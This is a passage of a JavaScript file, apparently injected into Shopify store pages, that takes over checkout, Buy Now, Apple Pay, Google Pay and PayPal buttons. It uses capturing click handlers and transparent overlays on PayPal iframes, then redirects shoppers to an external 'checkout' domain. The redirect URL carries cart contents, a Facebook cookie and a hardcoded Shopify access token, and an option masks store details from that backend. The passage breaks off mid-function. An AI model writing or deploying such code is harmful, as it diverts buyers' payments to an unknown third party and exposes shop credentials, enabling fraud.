var CHECKOUT_DOMAIN = "https://tao.greelk.it.com/checkouts/T4LQWgiz";       // 模版3D域名地址
var CHECKOUT_PAGE = "a_index.html";                 // 结账页文件名
var CHECKOUT_PROXY_PATH = "/a/s/";                  // 店铺里应用代理路径
var USE_SHOP_PROXY = 1;                             // 1=使用代理路径打开结账，0=使用模版3D域名打开结账网站
var SHOPIFY_ADMIN_TOKEN = "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";

// ==================== 像素配置说明 ====================
// 支持两种方式配置像素ID：
//
// 方式1（推荐）：通过URL参数动态指定（优先级最高）适合不同广告对应不同的像素ID区分
//   - Facebook: ?custom-facebook-pixel=你的像素ID
//   - TikTok:   ?custom-tiktok-pixel=你的像素ID
//   - 示例: https://yourstore.com/products/xxx?variant=123&custom-facebook-pixel=1234567890
//   - 用途: 不同广告使用不同像素ID，实现精准追踪
//
// 方式2：使用下方硬编码配置（默认值） 适合单广告，或者多广告使用同一个像素ID
//   - 当URL中没有像素参数时，使用此配置
//   - 适合全站统一使用一个像素ID的场景
// ====================================================

var FACEBOOK_PIXEL_ID = '';//FACEBOOK像素ID(数据集编号)

// TikTok Pixel配置
var TIKTOK_PIXEL_ID = '';          // TikTok Pixel ID（选填，格式：CXXXXXXXXXX）

// ==================== 信息遮蔽配置 ====================
// 0: 关闭，1: 开启 —— 开启后后台看到的店铺域名、商品名、商品图均替换为下方文本，不影响结账页展示
var MASK_STORE_INFO = 0;
var MASK_INFO_TEXT = "店铺已屏蔽该字段显示";

// ==================== 店铺 Logo 配置 ====================
// 手动指定店铺 logo 图片链接，填入后优先使用，留空则自动从页面识别
// 必须以 http:// 或 https:// 开头，否则视为无效，回退到自动识别
var STORE_LOGO_URL = '';

// ==================== 自定义结账按钮选择器配置 ====================
// 如果默认的按钮选择器无法劫持你的结账按钮，可以在这里添加自定义选择器
// 这些选择器会与内置选择器合并使用

var CUSTOM_CHECKOUT_SELECTORS = [
    // 在这里添加你的自定义选择器
    // 例如: '.my-checkout-button'
    'button.button--dark[type="submit"]',
    '[data-buy-now]',
    '[data-custom-checkout]'
];






// ====================END CONFIG====================


(function () {
    'use strict';

    // 通用配置 - 可以根据不同模板调整
    const CONFIG = {
        // 价格选择器 - 按优先级排序
        PRICE_SELECTORS: [
            // 通用价格选择器
            '[data-price]',
            '.price',
            '.money',
            '.current-price',
            '.product-price',

            // 特定模板选择器
            '.price--current .price-item--regular',
            '.price .price-item--regular',
            '.product__price .price-item--regular',
            '.price--current',
            '.price-current',
            '.price__current',

            // 备用选择器
            'span[class*="price"]',
            'div[class*="price"]',
            '[class*="price"]'
        ],

        // 标题选择器
        TITLE_SELECTORS: [
            // 通用标题选择器
            'h1[data-product-title]',
            '[data-product-title]',
            'h1',

            // 特定模板选择器
            '.product__title',
            '.product-title',
            '.product_title',
            '.product-single__title',
            '.product-meta h1',
            '.product-info h1',
            '.product-details h1',
            '.product-form h1'
        ],

        // 产品表单选择器
        FORM_SELECTORS: [
            'form[action*="/cart/add"]',
            '.product-form',
            '[data-product-id]',
            'form'
        ],

        // 变体ID选择器
        VARIANT_SELECTORS: [
            '[name="id"]',
            'select[name="id"] option:checked',
            'input[name="id"]:checked',
            '[data-variant-id]',
            '.product-variant-id'
        ]
    };

    // ===== 安全编码函数（双重URL编码，处理特殊字符如 #、emoji 等）=====
    function encodeCartDataForUrl(data) {
        // 双重编码：解决 # 和特殊字符问题，浏览器自动解码一次，前端再解码一次
        return encodeURIComponent(encodeURIComponent(JSON.stringify(data)));
    }

    // 通用工具函数
    const Utils = {
        // 获取URL参数（兼容编码格式）
        getUrlParameter: function(name) {
            try {
                const value = new URLSearchParams(window.location.search).get(name);
                if (value) return value;
                const decoded = decodeURIComponent(window.location.href);
                const match = decoded.match(new RegExp('[?&]' + name + '=([^&#]+)'));
                return match ? match[1] : null;
            } catch (error) {
                return null;
            }
        },

        // 查找元素 - 支持多个选择器
        findElement: function (selectors, context = document) {
            for (const selector of selectors) {
                const element = context.querySelector(selector);
                if (element) return element;
            }
            return null;
        }
    };

    // 只针对结账相关的按钮选择器，排除添加购物车按钮
    const CHECKOUT_BUTTON_SELECTORS = [
        '.btn--checkout',
        '.checkout-button',
        '.button-checkout',  // 添加 button-checkout class（顺序相反的变体）
        '.cart__checkout',
        '.cart__checkout-button',  // 添加这个选择器
        '.cart-checkout',
        '[href*="/checkout"]',
        '[data-href*="/checkout"]',  // 添加 data-href 属性支持
        'button[name="checkout"]',  // 添加 name="checkout" 的按钮
        '.shopify-payment-button__button',
        '.dynamic-checkout__content button',
        '.payment-button',
        '.checkout-btn',
        'button[name="goto_pp"]', // PayPal快速结账
        'button[name="goto_gc"]',  // Google Pay快速结账
        // Buy It Now 立即购买按钮
        '[data-skip-cart-button="true"]',  // 跳过购物车的立即购买按钮
        'button[data-skip-cart-button]',   // 任何带有 data-skip-cart-button 属性的按钮
        // PayPal 和更多支付选项相关选择器
        '.shopify-payment-button__more-options',
        '#more-payment-options-link',
        'more-payment-options-link',
        '[data-shopify-buttoncontainer]',
        '.shopify-payment-button',
        '.dynamic-checkout__content',
        // PayPal iframe 容器
        'iframe[name*="paypal"]',
        'iframe[title*="PayPal"]',
        '.paypal-button-container',
        '.paypal-buttons',
        // 新增选择器 - 覆盖更多场景
        '#cart-checkout',  // ID选择器
        '#cart-sidebar-checkout',  // 侧边栏购物车结账
        '[onclick*="/checkout"]',  // onclick 包含 /checkout
        '[onclick*="checkout"]',
        'a[href*="/checkout"]',
        'input[name="checkout"]',
        '.btn-checkout',
        '.checkoutButton',
        '.checkout_button',
        '.cart-checkout-button',
        '.cart__checkout-btn',
        '.cart-button-checkout',
        '.dynamic-checkout-button',
        '.payment-btn',
        '.btn-payment',
        '.proceed-to-checkout',
        '.proceed-checkout',
        'button[name="goto_ap"]',  // Apple Pay快速结账
        '.buy-it-now',
        '.buy-now',
        '.buynow',
        '.instant-checkout',
        '.checkout',
        '#checkout',
        '.complete-order',
        '.place-order',
        '.submit-order',
        '[class*="checkout-button"]',
        '[class*="button-checkout"]',
        '[id*="checkout"]',
        'button[type="submit"][class*="checkout"]'
    ];

    // 合并用户自定义选择器和内置选择器
    const ALL_CHECKOUT_SELECTORS = [
        ...CHECKOUT_BUTTON_SELECTORS,
        ...(typeof CUSTOM_CHECKOUT_SELECTORS !== 'undefined' && Array.isArray(CUSTOM_CHECKOUT_SELECTORS)
            ? CUSTOM_CHECKOUT_SELECTORS
            : [])
    ];

    // ==================== 按钮类型判断 ====================

    // 加购按钮选择器（需要排除，不劫持）
    const ADD_TO_CART_SELECTORS = [
        'button[name="add"]',
        'input[name="add"]',
        '.product-form__cart-submit',
        '.btn.product-form__cart-submit',
        '.product__add-to-cart',
        '.add-to-cart',
        '.product-form button[type="submit"]:not([name="checkout"])'
    ];

    // 购物车容器选择器（用于判断场景）
    const CART_CONTAINER_SELECTORS = [
        '.cart',
        '.cart-drawer',
        '.cart-page',
        '.cart-sidebar',
        '.drawer__content',
        '[data-cart]',
        '.mini-cart',
        '.cart-modal',
        '.cart-popup',
        '.cart-overlay'
    ];

    // 购物车结账按钮选择器
    const CART_CHECKOUT_SELECTORS = [
        '.cart__checkout-button',
        '.cart__checkout',
        '.cart-checkout',
        '.cart-checkout-button',
        'button[name="checkout"]',
        '#cart-checkout',
        '#cart-sidebar-checkout',
        '[id*="cart"][id*="checkout"]',
        '[class*="cart"][class*="checkout"]'
    ];

    /**
     * 获取按钮类型
     * @param {Element} button
     * @returns {'add_to_cart' | 'checkout' | 'other'}
     */
    function getButtonType(button) {
        // 用户自定义选择器优先级最高，避免被加购按钮规则误判
        if (CUSTOM_CHECKOUT_SELECTORS.length > 0 &&
            CUSTOM_CHECKOUT_SELECTORS.some(sel => button.matches(sel))) {
            return 'checkout';
        }
        // 优先判断是否是加购按钮（排除）
        if (ADD_TO_CART_SELECTORS.some(sel => button.matches(sel))) {
            return 'add_to_cart';
        }
        // 再判断是否是结账按钮
        if (ALL_CHECKOUT_SELECTORS.some(sel => button.matches(sel))) {
            return 'checkout';
        }
        return 'other';
    }

    /**
     * 获取购买场景
     * @param {Element} element
     * @returns {'cart' | 'single'}
     */
    function getScenario(element) {
        // 1. 在购物车容器内
        if (CART_CONTAINER_SELECTORS.some(sel => element.closest(sel))) {
            return 'cart';
        }
        // 2. 匹配购物车结账按钮选择器
        if (CART_CHECKOUT_SELECTORS.some(sel => element.matches(sel))) {
            return 'cart';
        }
        // 3. 当前页面是购物车页面
        if (window.location.pathname.includes('/cart')) {
            return 'cart';
        }
        return 'single';
    }

    // ==================== 商品数据获取 ====================

    /**
     * 从 DOM 提取 variantId 和 quantity
     * 供 getSingleProductInfoViaStorefront 使用
     * @param {Element} button 触发按钮
     * @returns {Object} { variantId, quantity }
     */
    function extractProductContext(button) {
        // 1. 找到按钮所属的产品容器（用于精确定位 variantId / quantity 输入框）
        let productCard = button.closest('product-card, product-form-component, .product-item, .product-card, .grid__item, .product, [data-product], [data-product-id], .card, .card-wrapper, li, article');

        // 1.1 如果找到的是 product-form-component，向上查找真正的 product-card
        if (productCard && productCard.tagName === 'PRODUCT-FORM-COMPONENT') {
            const parentProductCard = productCard.closest('product-card, .product-item, .product-card, .grid__item, .product, [data-product], [data-product-id]');
            if (parentProductCard && parentProductCard !== productCard) {
                productCard = parentProductCard;
            }
        }

        // 1.2 如果没有找到产品卡片，尝试找到 quick-add-component
        if (!productCard) {
            const quickAddComponent = button.closest('quick-add-component');
            if (quickAddComponent) {
                productCard = quickAddComponent.closest('product-card, product-form-component, .product-item, .product-card, .grid__item, .product, [data-product], [data-product-id]');
            }
        }

        // 1.3 如果容器太大（包含多个产品链接），缩小到精确容器
        if (productCard) {
            const productLinks = productCard.querySelectorAll('a[href*="/products/"]');
            if (productLinks.length > 1) {
                let currentContainer = button.parentElement;
                while (currentContainer && currentContainer !== productCard) {
                    const linksInContainer = currentContainer.querySelectorAll('a[href*="/products/"]');
                    if (linksInContainer.length === 1) {
                        productCard = currentContainer;
                        break;
                    }
                    currentContainer = currentContainer.parentElement;
                }
            }
        }

        // 2. 找到产品表单
        let productForm = null;
        if (productCard) {
            productForm = productCard.querySelector('form[action*="/cart/add"]') ||
                         productCard.querySelector('form');
        }
        if (!productForm) {
            productForm = button.closest('form') ||
                         button.form ||
                         Utils.findElement(CONFIG.FORM_SELECTORS, button.closest('form') || document);
        }

        // 3. 获取 variant ID（优先从表单隐藏字段，其次从 data 属性）
        let variantId = null;
        if (productForm) {
            const variantElement = productForm.querySelector('input[name="id"]') ||
                                  productForm.querySelector('select[name="id"]') ||
                                  productForm.querySelector('[name="id"]');
            if (variantElement) {
                variantId = variantElement.value || variantElement.dataset.variantId;
            }
        }
        if (!variantId) {
            variantId = button.dataset.variantId || productCard?.dataset.variantId || null;
        }
        // 兜底：商品页时从 URL ?variant= 参数获取
        if (!variantId && window.location.pathname.includes('/products/')) {
            variantId = new URLSearchParams(window.location.search).get('variant');
        }

        // 4. 获取数量
        let quantity = 1;
        const quantitySelectors = [
            'input[name="quantity"]',
            'quantity-input input',
            '.quantity-input input',
            '.quantity input[type="number"]',
            'input[type="number"][data-quantity-input]',
            '[data-quantity] input',
            'input.qty',
            'input[data-quantity-input]'
        ];
        const qtyContainers = [productForm, productCard,
            window.location.pathname.includes('/products/') ? document : null
        ].filter(Boolean);

        for (const container of qtyContainers) {
            for (const sel of quantitySelectors) {
                const el = container.querySelector(sel);
                if (el && el.value && parseInt(el.value) > 0) {
                    quantity = parseInt(el.value);
                    break;
                }
            }
            if (quantity > 1) break;
        }

        return { variantId, quantity };
    }

    /**
     * 获取购物车信息
     */
    async function getCartInfo() {
        try {
            const response = await fetchWithRetry('/cart.js', {});
            const cart = await response.json();

            const result = {
                type: 'cart',
                products: cart.items.map(item => ({
                    id: item.variant_id,
                    title: item.product_title,
                    variant_title: item.variant_title,
                    quantity: item.quantity,
                    price: (item.price / 100).toFixed(2),
                    image: item.image,
                    line_price: (item.line_price / 100).toFixed(2),
                    original_price: (item.original_price / 100).toFixed(2),
                    original_line_price: (item.original_line_price / 100).toFixed(2),
                    total_discount: (item.total_discount / 100).toFixed(2)
                })),
                total: (cart.total_price / 100).toFixed(2),
                total_discount: (cart.total_discount / 100).toFixed(2)
            };

            console.log('[ProductData] 购物车场景 → 从 /cart.js 获取', result);
            return result;
        } catch (error) {
            console.log('[ProductData] 购物车场景 → 获取失败', error);
            return { type: 'cart', products: [], total: '0' };
        }
    }

    /**
     * 带重试的 fetch（处理 429 限流），固定 500ms 间隔重试，最多 5 秒
     * @param {string} url
     * @param {Object} options fetch 选项
     * @param {number} maxTime 最大重试时间（毫秒）
     * @returns {Promise<Response>}
     */
    async function fetchWithRetry(url, options, maxTime = 5000) {
        const start = Date.now();
        while (true) {
            const response = await fetch(url, options);
            if (response.status !== 429 || Date.now() - start >= maxTime) {
                return response;
            }
            console.log('[fetchWithRetry] 429 限流，500ms 后重试: ' + url);
            await new Promise(r => setTimeout(r, 500));
        }
    }

    /**
     * 通过 Storefront GraphQL API 获取单品信息（不影响用户购物车）
     * 使用 cartCreate mutation 创建独立 Cart 对象，获取折扣后实际价格
     * 无 variantId 或请求失败时返回空数据
     * @param {Element} button 触发按钮
     * @returns {Promise<Object>} 商品信息
     */
    async function getSingleProductInfoViaStorefront(button) {
        const { variantId, quantity } = extractProductContext(button);

        if (!variantId) {
            console.log('[ProductData] Storefront 模式 → 无 variantId');
            return { type: 'single', products: [], total: '0' };
        }

        try {
            const merchandiseId = `gid://shopify/ProductVariant/${variantId}`;
            const qty = parseInt(quantity) || 1;

            const query = `mutation {
                cartCreate(input: {
                    lines: [{ merchandiseId: "${merchandiseId}", quantity: ${qty} }]
                }) {
                    cart {
                        lines(first: 1) {
                            edges {
                                node {
                                    quantity
                                    merchandise {
                                        ... on ProductVariant {
                                            id
                                            title
                                            priceV2 { amount }
                                            product {
                                                title
                                                featuredImage { url }
                                            }
                                        }
                                    }
                                    cost { amountPerQuantity { amount } }
                                }
                            }
                        }
                        cost { totalAmount { amount } }
                    }
                    userErrors { field message }
                }
            }`;

            const response = await fetch('/api/2024-01/graphql.json', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'X-Shopify-Storefront-Access-Token': ''
                },
                body: JSON.stringify({ query })
            });

            if (!response.ok) {
                console.log('[ProductData] Storefront API 请求失败', response.status);
                return { type: 'single', products: [], total: '0' };
            }

            const json = await response.json();
            const cartResult = json.data?.cartCreate;

            if (!cartResult?.cart || cartResult.userErrors?.length > 0) {
                console.log('[ProductData] Storefront cartCreate 失败', cartResult?.userErrors);
                return { type: 'single', products: [], total: '0' };
            }

            const line = cartResult.cart.lines.edges[0]?.node;
            if (!line) {
                console.log('[ProductData] Storefront 返回空商品行');
                return { type: 'single', products: [], total: '0' };
            }

            const variant = line.merchandise;
            const total = parseFloat(cartResult.cart.cost.totalAmount.amount).toFixed(2);
            const originalPrice = parseFloat(variant.priceV2.amount).toFixed(2);
            // totalAmount 是 Storefront API 实际折后总价，用它反推单价和折扣
            const price = (parseFloat(total) / line.quantity).toFixed(2);
            const linePrice = total;
            const originalLinePrice = (parseFloat(originalPrice) * line.quantity).toFixed(2);
            const totalDiscount = (parseFloat(originalLinePrice) - parseFloat(total)).toFixed(2);

            const result = {
                type: 'single',
                products: [{
                    id: parseInt(variant.id.split('/').pop()),
                    title: variant.product.title,
                    variant_title: variant.title !== 'Default Title' ? variant.title : '',
                    quantity: line.quantity,
                    price: price,
                    image: variant.product.featuredImage?.url || '',
                    original_price: originalPrice,
                    line_price: linePrice,
                    original_line_price: originalLinePrice,
                    total_discount: totalDiscount
                }],
                total: total,
                total_discount: totalDiscount
            };

            console.log('[ProductData] Storefront 模式 → cartCreate 成功', result);
            return result;

        } catch (error) {
            console.log('[ProductData] Storefront 模式 → 异常', error);
            return { type: 'single', products: [], total: '0' };
        }
    }
    // ==================== 特殊支付按钮处理 ====================

    /**
     * 处理特殊支付按钮点击（统一逻辑）
     * @param {Element} element
     * @param {Event} e
     */
    async function handleSpecialPaymentClick(element, e) {
        e.preventDefault();
        e.stopPropagation();
        showButtonLoading(element);

        const scenario = getScenario(element);

        // 单品场景：先主动上报 AddToCart 像素
        if (scenario === 'single') {
            console.log('[Pixel] 单品直接购物 → 主动上报 AddToCart');
            fbq_report_addtocart();
            ttq_report_addtocart();
            // 等待 1 秒，确保像素上报完成后再跳转
            await new Promise(r => setTimeout(r, 1000));
        }

        const productData = await getProductData(scenario, element);

        redirectToCustomCheckout(productData);
    }

    /**
     * 处理PayPal iframe和更多支付选项
     */
    function handleSpecialPaymentButtons() {
        // 处理"更多支付选项"链接
        const moreOptionsLinks = document.querySelectorAll('.shopify-payment-button__more-options, #more-payment-options-link, more-payment-options-link a');
        moreOptionsLinks.forEach(link => {
            if (link.dataset.hijacked) return;
            link.dataset.hijacked = 'true';
            link.addEventListener('click', (e) => handleSpecialPaymentClick(link, e), true);
        });

        // 处理PayPal iframe容器的点击
        const paypalContainers = document.querySelectorAll('.paypal-button-container, .paypal-buttons, [data-shopify-buttoncontainer]');
        paypalContainers.forEach(container => {
            if (container.dataset.hijacked) return;
            container.dataset.hijacked = 'true';
            container.addEventListener('click', (e) => handleSpecialPaymentClick(container, e), true);
        });

        // 处理PayPal iframe
        const paypalIframes = document.querySelectorAll('iframe[name*="paypal"], iframe[title*="PayPal"]');
        paypalIframes.forEach(iframe => {
            if (iframe.dataset.hijacked) return;
            iframe.dataset.hijacked = 'true';
            iframe.addEventListener('click', (e) => handleSpecialPaymentClick(iframe, e), true);
            iframe.addEventListener('load', () => addPayPalOverlay(iframe));
        });
    }

    /**
     * 为PayPal iframe添加透明覆盖层来捕获点击
     * @param {HTMLIFrameElement} iframe
     */
    function addPayPalOverlay(iframe) {
        if (iframe.parentNode.querySelector('.paypal-overlay')) return;

        const overlay = document.createElement('div');
        overlay.className = 'paypal-overlay';
        overlay.style.cssText = 'position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: transparent; z-index: 999; cursor: pointer;';

        const parent = iframe.parentNode;
        if (getComputedStyle(parent).position === 'static') parent.style.position = 'relative';

        overlay.addEventListener('click', (e) => handleSpecialPaymentClick(iframe, e));
        parent.appendChild(overlay);
    }

    // 获取商店货币信息
    // 从 window.Shopify 全局对象获取货币信息（Shopify 在所有主题页面注入，零请求、100% 准确）
    function getStoreCurrency() {
        return {
            currency: window.Shopify?.currency?.active || 'USD',
            money_format: window.Shopify?.money_format || '{{amount}}'
        };
    }

    // 获取商店logo信息
    function getStoreLogo() {
        // 优先使用手动配置的 logo 链接
        if (typeof STORE_LOGO_URL === 'string' &&
            (STORE_LOGO_URL.startsWith('http://') || STORE_LOGO_URL.startsWith('https://'))) {
            return STORE_LOGO_URL;
        }
        try {
            // 尝试从多个可能的位置获取logo
            const logoSelectors = [
                // Shopify官方主题
                '.header__logo img',
                '.header__heading-logo',
                '.site-header__logo img',
                '.header__heading-link img',
                // 通用logo选择器
                '.logo img',
                '.header-logo img',
                '.site-logo img',
                '.brand-logo img',
                '.header .logo img',
                '.navbar-brand img',
                '.custom-logo',
                '#logo img',
                '#site-logo img',
                // alt属性匹配
                'header img[alt*="logo"]',
                'header img[alt*="Logo"]',
                '.header img[alt*="logo"]',
                '.site-header img[alt*="logo"]',
                'img[alt*="brand"]',
                // class/id包含logo
                'img[class*="logo"]',
                'img[id*="logo"]',
                'img[class*="Logo"]',
                // SVG logo
                'header svg[class*="logo"]',
                '.header__logo svg',
                '.logo svg',
                // 链接内的logo
                'a[href="/"] img',
                'header a img',
                '.header a[href="/"] img'
            ];

            for (const selector of logoSelectors) {
                const logoElement = document.querySelector(selector);
                if (logoElement && logoElement.src) {
                    let logoUrl = logoElement.src;
                    // 确保使用HTTPS
                    if (logoUrl.startsWith('http:')) {
                        logoUrl = logoUrl.replace('http:', 'https:');
                    }
                    // 确保是完整URL
                    if (!logoUrl.startsWith('http')) {
                        if (logoUrl.startsWith('//')) {
                            logoUrl = 'https:' + logoUrl;
                        } else if (logoUrl.startsWith('/')) {
                            logoUrl = window.location.origin + logoUrl;
                        }
                    }
                    return logoUrl;
                }
            }

            // 尝试从JSON-LD数据获取logo
            const jsonLdScripts = document.querySelectorAll('script[type="application/ld+json"]');
            for (const script of jsonLdScripts) {
                try {
                    const data = JSON.parse(script.textContent);
                    if (data['@type'] === 'Organization' && data.logo) {
                        const logoUrl = typeof data.logo === 'string' ? data.logo : data.logo.url;
                        if (logoUrl) {
                            return logoUrl;
                        }
                    }
                } catch (e) { }
            }

            return null;
        } catch (error) {
            return null;
        }
    }

    // ==================== 像素追踪配置函数 ====================

    // 通用像素ID获取函数（支持SessionStorage持久化）
    // 优先级：URL参数 > SessionStorage > 硬编码配置
    function getPixelId(urlParamName, sessionKey, defaultValue) {
        try {
            // 优先级1: 从URL参数获取（最高优先级）
            const urlPixel = Utils.getUrlParameter(urlParamName);
            if (urlPixel) {
                sessionStorage.setItem(sessionKey, urlPixel);
                console.log(`[Pixel] ${sessionKey}: 从URL参数获取 → ${urlPixel}`);
                return urlPixel;
            }

            // 优先级2: 从SessionStorage读取（跨页面保持）
            const sessionPixel = sessionStorage.getItem(sessionKey);
            if (sessionPixel) {
                console.log(`[Pixel] ${sessionKey}: 从SessionStorage获取 → ${sessionPixel}`);
                return sessionPixel;
            }

            // 优先级3: 使用硬编码的配置（默认值）
            if (defaultValue) {
                console.log(`[Pixel] ${sessionKey}: 从硬编码配置获取 → ${defaultValue}`);
                return defaultValue;
            }

            console.log(`[Pixel] ${sessionKey}: 未配置`);
            return null;
        } catch (error) {
            console.log(`[Pixel] ${sessionKey}: 获取失败`, error);
            return defaultValue || null;
        }
    }

    // 获取Facebook像素ID
    function getFacebookPixelId() {
        return getPixelId(
            'custom-facebook-pixel',           // URL参数名
            'shopify_facebook_pixel_id',       // SessionStorage键名
            FACEBOOK_PIXEL_ID                  // 默认值
        );
    }

    // 获取Facebook Browser ID
    function getFBP() {
        const fbpMatch = document.cookie.match(/_fbp=([^;]*)/);
        return fbpMatch ? fbpMatch[1] : null;
    }

    // 获取TikTok Pixel ID
    function getTikTokPixelId() {
        return getPixelId(
            'custom-tiktok-pixel',             // URL参数名
            'shopify_tiktok_pixel_id',         // SessionStorage键名
            TIKTOK_PIXEL_ID                    // 默认值
        );
    }

    // 统一的跳转函数
    /**
     * 提取店铺主域名（只保留 protocol + hostname）
     * @returns {string} 格式如 https://example.com
     */
    function getStoreDomain() {
        try {
            // 优先使用 URL API（现代浏览器）
            const url = new URL(window.location.href);
            return `${url.protocol}//${url.hostname}`;
        } catch (e) {
            // 降级方案：正则匹配 https://xxx 或 http://xxx
            const match = window.location.href.match(/^(https?:\/\/[^\/]+)/i);
            return match ? match[1] : window.location.origin;
        }
    }

    // 拼结账地址（自动处理多余的 /）
    function joinCheckoutUrlPath(base, ...segments) {
        const normalizedBase = String(base).trim().replace(/\/+$/, '');
        const normalizedSegments = segments
            .map(function (seg) {
                return String(seg).trim().replace(/^\/+|\/+$/g, '');
            })
            .filter(function (seg) {
                return seg.length > 0;
            });
        return [normalizedBase].concat(normalizedSegments).join('/');
    }

    /**
     * 解析模版 3D 地址：结账基址（供 cart_data）与路径后缀（供店铺代理拼接）
     * @returns {{ checkoutBase: string, pathSuffix: string }}
     */
    function parseCheckoutDomainConfig() {
        const raw = String(CHECKOUT_DOMAIN).trim();
        if (!raw) {
            throw new Error('须配置 CHECKOUT_DOMAIN');
        }
        if (!/^https?:\/\//i.test(raw)) {
            throw new Error('CHECKOUT_DOMAIN 须以 http:// 或 https:// 开头');
        }
        let url;
        try {
            url = new URL(raw);
        } catch (e) {
            throw new Error('CHECKOUT_DOMAIN 格式无效');
        }
        if (url.protocol !== 'http:' && url.protocol !== 'https:') {
            throw new Error('CHECKOUT_DOMAIN 须为 http 或 https');
        }

        let path = url.pathname.replace(/^\/+|\/+$/g, '');
        const page = String(CHECKOUT_PAGE).trim().replace(/^\/+/, '');
        if (page && path) {
            const segments = path.split('/').filter(function (seg) {
                return seg.length > 0;
            });
            if (segments.length > 0 && segments[segments.length - 1] === page) {
                segments.pop();
                path = segments.join('/');
            }
        }

        const pathSuffix = path;
        const checkoutBase = pathSuffix
            ? joinCheckoutUrlPath(url.origin, pathSuffix)
            : String(url.origin).replace(/\/+$/, '');

        return {
            checkoutBase: checkoutBase,
            pathSuffix: pathSuffix
        };
    }

    function buildCheckoutBaseUrl() {
        if (USE_SHOP_PROXY !== 0 && USE_SHOP_PROXY !== 1) {
            throw new Error('USE_SHOP_PROXY 须为 0 或 1');
        }

        const parsed = parseCheckoutDomainConfig();

        if (USE_SHOP_PROXY === 1) {
            return joinCheckoutUrlPath(
                window.location.origin,
                CHECKOUT_PROXY_PATH,
                parsed.pathSuffix,
                CHECKOUT_PAGE
            );
        }

        return joinCheckoutUrlPath(parsed.checkoutBase, CHECKOUT_PAGE);
    }

    function getNormalizedCheckoutDomain() {
        return parseCheckoutDomainConfig().checkoutBase;
    }

    async function redirectToCustomCheckout(productData) {
        sessionStorage.setItem('JwrIsShopify', 'true');

        const baseUrl = buildCheckoutBaseUrl();

        if (productData && productData.products.length > 0) {
            try {
                // 添加当前商店域名信息（只保留主域名）
                productData.store_domain = getStoreDomain();

                // 添加外部结账域名（供外部结账页使用，与 3D 地址路径一致）
                productData.checkout_domain = getNormalizedCheckoutDomain();

                // 添加商店logo信息
                const storeLogo = getStoreLogo();
                if (storeLogo) {
                    productData.store_logo = storeLogo;
                }

                // 获取商店货币信息
                const currencyInfo = getStoreCurrency();
                productData.store_currency = currencyInfo.currency;
                productData.store_money_format = currencyInfo.money_format;

                // 添加Facebook像素信息
                productData.facebook_pixel_id = getFacebookPixelId();
                productData.fbp = getFBP();

                // 添加TikTok Pixel ID
                productData.tiktok_pixel_id = getTikTokPixelId();

                // 添加Shopify配置信息
                productData.shopify_config = {
                    shop_name: new URL(getStoreDomain()).hostname,
                    access_token: SHOPIFY_ADMIN_TOKEN
                };

                // 遮蔽配置（由后台读取，不影响结账页展示）
                productData.mask_info = MASK_STORE_INFO;
                productData.mask_text = MASK_INFO_TEXT;

                // 将商品数据编码为URL参数（使用双重URL编码，处理特殊字符）
                const encodedData = encodeCartDataForUrl(productData);
                const redirectUrl = `${baseUrl}?cart_data=${encodedData}&source=${productData.type}`;

                // 存储到sessionStorage作为备份
                sessionStorage.setItem('shopify_store_domain', productData.store_domain);
                if (storeLogo) {
                    sessionStorage.setItem('shopify_store_logo', storeLogo);
                }
                sessionStorage.setItem('shopify_store_currency', productData.store_currency);
                sessionStorage.setItem('shopify_store_money_format', productData.store_money_format);
                sessionStorage.setItem('shopify_config', JSON.stringify(productData.shopify_config));

                // 设置标记，表示即将跳转到结账页面
                sessionStorage.setItem('from_checkout_redirect', 'true');

                window.location.href = redirectUrl;
            } catch (error) {
                // 如果编码失败，直接跳转
                window.location.href = baseUrl;
            }
        } else {
            // 即使没有商品数据，也传递商店域名和logo
            try {
                const storeDomain = getStoreDomain();
                const storeLogo = getStoreLogo();

                sessionStorage.setItem('shopify_store_domain', storeDomain);
                if (storeLogo) {
                    sessionStorage.setItem('shopify_store_logo', storeLogo);
                }

                let redirectUrl = `${baseUrl}?store_domain=${encodeURIComponent(storeDomain)}`;
                if (storeLogo) {
                    redirectUrl += `&store_logo=${encodeURIComponent(storeLogo)}`;
                }

                window.location.href = redirectUrl;
            } catch (error) {
                window.location.href = baseUrl;
            }
        }
    }

    // ==================== 按钮劫持逻辑 ====================

    /**
     * 获取商品数据（统一入口）
     * 购物车场景 → GET /cart.js
     * 单品场景   → Storefront GraphQL cartCreate
     * @param {'cart' | 'single'} scenario
     * @param {Element} element
     * @returns {Promise<Object>}
     */
    async function getProductData(scenario, element) {
        if (scenario === 'cart') {
            console.log('[ProductData] 购物车场景');
            return await getCartInfo();
        }
        // 单品场景：仅走 Storefront API（测试阶段，DOM/Product API 降级已禁用）
        return await getSingleProductInfoViaStorefront(element);
    }

    /**
     * 劫持结账按钮
     * @param {Element} button
     */
    function hijackCheckoutButton(button) {
        // 已劫持，跳过
        if (button.dataset.hijacked) return;

        // 判断按钮类型
        const buttonType = getButtonType(button);

        // 只劫持结账按钮，加购按钮和其他按钮不劫持
        if (buttonType !== 'checkout') return;

        button.dataset.hijacked = 'true';

        button.addEventListener('click', async function (e) {
            e.preventDefault();
            e.stopPropagation();
            showButtonLoading(button);

            // 判断场景
            const scenario = getScenario(button);

            // 单品场景：先主动上报 AddToCart 像素
            if (scenario === 'single') {
                console.log('[Pixel] 单品直接购物 → 主动上报 AddToCart');
                fbq_report_addtocart();
                ttq_report_addtocart();
                // 等待 1 秒，确保像素上报完成后再跳转
                await new Promise(r => setTimeout(r, 1000));
            }

            // 获取商品数据
            const productData = await getProductData(scenario, button);

            // 跳转到自定义结账页
            redirectToCustomCheckout(productData);
        }, true);
    }

    // 添加必要的CSS样式
    function addPaymentInterceptStyles() {
        if (document.querySelector('#payment-intercept-styles')) return;
        const style = document.createElement('style');
        style.id = 'payment-intercept-styles';
        style.textContent = '.paypal-overlay { position: absolute !important; top: 0 !important; left: 0 !important; width: 100% !important; height: 100% !important; background: transparent !important; z-index: 999 !important; cursor: pointer !important; pointer-events: auto !important; } .paypal-button-container, .paypal-buttons, [data-shopify-buttoncontainer] { position: relative !important; } @keyframes checkout-spin { to { transform: rotate(360deg); } }';
        document.head.appendChild(style);
    }

    /**
     * 给按钮添加加载状态（替换内容为居中 spinner）
     * @param {Element} button
     */
    function showButtonLoading(button) {
        if (button.dataset.loading === 'true') return;
        button.dataset.loading = 'true';
        button.dataset.originalHtml = button.innerHTML;
        button.disabled = true;
        button.style.pointerEvents = 'none';
